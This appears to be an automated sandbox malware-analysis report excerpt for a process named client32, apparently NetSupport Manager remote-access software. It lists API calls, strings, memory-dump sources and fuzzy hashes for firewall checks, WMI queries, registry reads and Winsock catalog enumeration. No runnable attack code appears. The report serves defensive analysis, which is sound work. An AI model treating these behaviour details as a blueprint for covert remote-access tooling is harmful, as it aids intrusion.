  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• std::exception::exception.LIBCMT ref: 11110E4A
• __CxxThrowException@8.LIBCMT ref: 11110E5F
• GetCurrentThreadId.KERNEL32 ref: 11110E76
• InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
• InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
• EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
• LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
• String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
• API String ID: 1976012330-1024648535
• Opcode ID: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
• Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
• Opcode Fuzzy Hash: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
• Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
APIs
• RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,1B702977,00000000,?,00000000), ref: 110613A4
• _malloc.LIBCMT ref: 110613EB
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,1B702977,00000000), ref: 1106142B
• RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
• _free.LIBCMT ref: 110614A4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
• String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
• API String ID: 999355418-161875503
• Opcode ID: 2f8ee5cf0599d0cb1ab7719bd1c1ba46f0334f60211ecdc2d996a40dffef4bdf
• Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
• Opcode Fuzzy Hash: 2f8ee5cf0599d0cb1ab7719bd1c1ba46f0334f60211ecdc2d996a40dffef4bdf
• Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,1B702977,00000000,?), ref: 1115C927
• CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
• wsprintfW.USER32 ref: 1115C967
• SysAllocString.OLEAUT32(?), ref: 1115C973
• wsprintfW.USER32 ref: 1115CA27
• SysFreeString.OLEAUT32(?), ref: 1115CAC8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
• String ID: SELECT * FROM %s$WQL$root\CIMV2
• API String ID: 3050498177-823534439
• Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
• Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
• Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
• Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
APIs
  • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
  • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
• _memset.LIBCMT ref: 11146055
• GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
• GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
• FreeLibrary.KERNEL32(00000000), ref: 111460BF
• GetSystemDefaultLangID.KERNEL32 ref: 111460CA
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
• String ID: GetUserDefaultUILanguage$kernel32.dll
• API String ID: 4251163631-545709139
• Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
• Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
• Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
• Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
APIs
• wsprintfA.USER32 ref: 1101567A
• _memset.LIBCMT ref: 110156BE
• RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
Strings
• PackedCatalogItem, xrefs: 110156E2
• SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
• NSLSP, xrefs: 11015708
• %012d, xrefs: 11015674
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: QueryValue_memsetwsprintf
• String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
• API String ID: 1333399081-1346142259
• Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
• Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
• Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
• Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
• std::_Lockit::_Lockit.LIBCPMT ref: 11010190
• std::bad_exception::bad_exception.LIBCMT ref: 11010214
• __CxxThrowException@8.LIBCMT ref: 11010222
• std::_Lockit::_Lockit.LIBCPMT ref: 11010235
• std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Similarity
• API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
• String ID: bad cast
• API String ID: 2427920155-3145022300
• Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
• Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
• Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
• Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
• SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
• SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: same 13 memory dumps of process 0000000D (image base 11000000) as listed for the first function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Similarity
• API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
• String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
• API String ID: 3494822531-1878648853
• Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
• Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
• Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
• Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
APIs
• IsJPIK.PCICHEK(1B702977,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: same 13 memory dumps of process 0000000D (image base 11000000) as listed for the first function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Similarity
• API ID: _free_malloc_memsetwsprintf
• String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
• API String ID: 2814900446-469156069
• Opcode ID: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
• Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
• Opcode Fuzzy Hash: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
• Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
APIs
• WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 1101792C
• CoInitialize.OLE32(00000000), ref: 11017935
• _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
• CoUninitialize.COMBASE ref: 110179C0
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: same 13 memory dumps of process 0000000D (image base 11000000) as listed for the first function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Similarity
• API ID: InitializeObjectSingleStringUninitializeW@16Wait
• String ID: PCSystemTypeEx$Win32_ComputerSystem
• API String ID: 2407233060-578995875
• Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
• Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
• Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
• Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
APIs
• WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 11017842
• CoInitialize.OLE32(00000000), ref: 1101784B
• _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
• CoUninitialize.COMBASE ref: 110178D0
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: same 13 memory dumps of process 0000000D (image base 11000000) as listed for the first function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Similarity
• API ID: InitializeObjectSingleStringUninitializeW@16Wait
• String ID: ChassisTypes$Win32_SystemEnclosure
• API String ID: 2407233060-2037925671
• Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
• Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
• Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
• Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
Strings
• Client, xrefs: 11139655
• AutoICFConfig, xrefs: 11139650
• DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
• DoICFConfig() OK, xrefs: 111396D6
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: same 13 memory dumps of process 0000000D (image base 11000000) as listed for the first function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Similarity
• API ID: CountTick
• String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
• API String ID: 536389180-1512301160
• Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
• Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
• Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
• Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
APIs
• CoInitialize.OLE32(00000000), ref: 11096DA4
• CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
• CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
• CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateFromInitializeInstanceProgUninitialize
• String ID: HNetCfg.FwMgr$ICF Present:
• API String ID: 3222248624-258972079
• Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
• Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
• Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
• Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
APIs
• GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
• K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
• GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
• SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorFileImageLastNameProcess
• String ID: GetModuleFileNameExA$GetProcessImageFileNameA
• API String ID: 4186647306-532032230
• Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
• Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
• Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
• Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,776CC3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
• CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
• WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
• CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID: ..\ctl32\Refcount.cpp$hThread
• API String ID: 3360349984-1136101629
• Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
• Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
• Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
• Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf
• String ID: %s%s%s.bin$878411$_HF$_HW$_SW
• API String ID: 2111968516-3519358435
• Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
• Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
• Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
• Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
APIs
• GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
• GetStockObject.GDI32(00000004), ref: 111036DB
• RegisterClassA.USER32(?), ref: 111036EF
• CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AtomClassCreateGlobalObjectRegisterStockWindow
• String ID: NSMDesktopWnd
• API String ID: 2669163067-206650970
